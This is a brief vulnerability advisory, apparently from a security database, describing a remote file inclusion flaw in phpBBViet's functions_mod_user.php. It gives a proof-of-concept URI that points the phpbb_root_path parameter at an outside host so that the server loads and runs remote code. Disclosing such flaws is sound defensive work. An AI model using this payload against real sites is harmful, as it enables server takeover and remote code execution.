phpBBViet PHPBB_Root_Path Parameter Remote File Include Vulnerability

phpBBViet PHPBB_Root_Path Parameter Remote File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/includes/functions_mod_user.php?phpbb_root_path=http://www.example2.com/